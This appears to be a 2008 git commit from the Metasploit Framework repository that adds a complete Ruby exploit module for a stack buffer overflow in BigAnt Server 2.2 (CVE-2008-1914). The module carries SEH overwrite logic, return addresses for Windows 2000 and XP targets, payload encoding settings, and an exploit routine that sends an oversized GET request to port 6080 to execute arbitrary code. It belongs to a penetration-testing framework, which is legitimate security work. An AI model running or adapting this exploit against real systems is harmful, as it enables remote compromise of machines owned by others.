added exploit module bigant_server.rb

git-svn-id: file:///home/svn/framework3/trunk@5503 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
Mario Ceballos 2008-05-15 00:58:44 +00:00
parent 0adab629ba
commit 9871f14f32
1 changed files with 78 additions and 0 deletions

View File

@ -0,0 +1,78 @@
##
# $Id: bigant_server.rb
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
module Msf
class Exploits::Windows::Misc::Bigant_Server < Msf::Exploit::Remote
include Exploit::Remote::Tcp
include Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'BigAnt Server 2.2 Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in BigAnt Server 2.2.
By sending a specially crafted packet, an attacker may be
able to execute arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '28795' ],
[ 'CVE', '2008-1914' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 750,
'BadChars' => "\x00\x20\x0a\x0d",
'StackAdjustment' => -3500,
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000 Pro All English', { 'Ret' => 0x75022ac4 } ],
[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 15 2008'))
register_options([Opt::RPORT(6080)], self.class)
end
def exploit
connect
sploit = "GET " + rand_text_alpha_upper(950) + generate_seh_payload(target.ret)
sploit << rand_text_alpha_upper(1024 - payload.encoded.length)
print_status("Trying target #{target.name}...")
sock.put(sploit + "\n\n")
handler
disconnect
end
end
end